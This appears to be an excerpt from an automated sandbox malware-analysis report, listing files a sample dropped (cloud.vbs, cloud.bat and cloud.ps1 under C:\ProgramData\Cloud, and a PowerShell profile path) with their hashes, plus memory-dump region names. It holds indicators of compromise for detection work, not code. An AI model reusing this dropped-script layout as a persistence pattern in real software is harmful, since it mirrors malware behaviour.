SHA512 f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/3620-32-0x00007FFCA0690000-0x00007FFCA1151000-memory.dmp

C:\ProgramData\Cloud\cloud.vbs

MD5 7079642a22a106d0ed6f227cc70899ae
SHA1 60dd57af3518c0ea4104379ad233b5982b231283
SHA256 b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724
SHA512 ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80

C:\ProgramData\Cloud\cloud.bat

MD5 b8bdfc7895feaaacba3711d17be6778a
SHA1 fa0bc12827b348fe540a13683897deb207650df7
SHA256 e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3
SHA512 ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156

C:\ProgramData\Cloud\cloud.ps1

MD5 d93d9d8d63201a2e547d4e1dde62d6d7
SHA1 5a2273543ad08d5f749c9c7ee60e0b703548b8e7
SHA256 f5811cd347fc2f2d538625c468ae7ecbd8d0c18db495b9d3701204f7a13a527e
SHA512 59de80b3ce3e5406a8e1f2544fabb50a7d95b037143652fc0084b8bfe864337e0d4ab3cd14ef3c8249944bdccf9e27dce3471d955fac278ff45a68d32320e699

memory/3500-46-0x0000022A02170000-0x0000022A0217E000-memory.dmp

memory/772-47-0x0000000000F40000-0x0000000000F58000-memory.dmp

memory/772-49-0x0000000005970000-0x0000000005986000-memory.dmp

memory/772-50-0x0000000006240000-0x00000000067E4000-memory.dmp

memory/772-51-0x0000000005E80000-0x0000000005F12000-memory.dmp

memory/772-52-0x0000000006010000-0x000000000601A000-memory.dmp

memory/772-53-0x0000000006A30000-0x0000000006ACC000-memory.dmp

memory/772-54-0x0000000006AD0000-0x0000000006B36000-memory.dmp